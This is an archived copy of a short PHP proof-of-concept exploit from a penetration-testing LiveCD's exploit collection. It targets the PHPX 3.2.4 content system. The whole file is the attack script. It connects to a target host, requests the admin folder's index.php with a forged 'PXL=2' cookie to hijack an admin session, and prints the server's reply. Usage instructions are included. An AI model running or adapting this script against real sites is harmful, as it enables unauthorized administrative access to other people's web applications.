home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / phpnuke / phpxSessHijackPOC.php

< prev

next >

Wrap

PHP Script  |  2005-02-12  |  1KB  |  48 lines

---

1. <?php
2. /* Proof of concept for exploiting PHPX 3.2.4 (http://www.phpx.org) */
3. /* Quick hack, not really an affective tool, only useful as a demonstration */
4. /* Written by HelloWorld - Ryan Wray */
5.  
6. /* Usage: php -q exploit_file.php <host> <port> <admin_folder_location> */
7. function usage()
8. {
9.     echo "Usage request";
10. }
11.  
12. function bytes_left($fp)
13. {
14.     $status=socket_get_status($fp);
15.     if($status['unread_bytes'] > 0) { return true; }
16.     return false;
17. }
18. print_r($_SERVER['argv']);
19. if($_SERVER['argc'] != 4)
20. {
21.     exit(usage());
22. }
23.  
24. // Attempt to connect to host.
25. $fp=@fsockopen($_SERVER['argv'][1],$_SERVER['argv'][2]);
26.  
27. if(!$fp)
28. {
29.     exit('Could not connect to host: '.$_SERVER['argv'][1].':'.$_SERVER['argv'][2]);
30. }
31.  
32. else
33. {
34.     fputs($fp,"GET ".$_SERVER['argv'][3]."index.php HTTP/1.1\r\n");
35.     fputs($fp,"Host: ".$_SERVER['argv'][1]."\r\n");
36.     fputs($fp,"Cookie: PXL=2\r\n\r\n");
37. }
38. // Start accepting data, otherwise socket_get_status will say there are 0 unread bytes.
39. echo fgets($fp,1024);
40. // While we can read.
41. while(bytes_left($fp))
42. {
43.     echo fgets($fp,1024);
44. }
45. // Close the socket.
46. fclose($fp);
47. ?>
48.